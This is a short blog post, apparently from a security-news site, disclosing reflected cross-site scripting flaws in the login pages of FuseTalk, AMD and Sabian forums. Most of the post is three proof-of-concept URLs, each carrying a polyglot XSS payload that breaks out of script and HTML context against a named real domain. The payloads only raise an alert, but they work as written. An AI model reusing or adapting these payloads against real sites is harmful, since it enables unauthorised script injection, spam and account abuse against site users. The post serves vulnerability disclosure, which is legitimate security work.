Search This Blog

Powered by Blogger.

Blog Archive

Labels

Reflected XSS Vulnerability in FuseTalk ,AMD forums


Hacker "Sony" discovered Reflected XSS vulnerability in FuseTalk ,AMD and Sabian forums.  It is not critical Vulnerability but attackers can use it for spamming.  Previously, he discovered and reported lot of vulnerabilities in famous websites including Adobe,Oxford univ..


Proof of Concept:
fusetalk.com:

http://forums.fusetalk.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

forums.amd.com:

http://forums.amd.com/game/login.cfm?windowed=yes%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

community.sabian.com:

http://community.sabian.com/fusetalk/forum/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 

Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability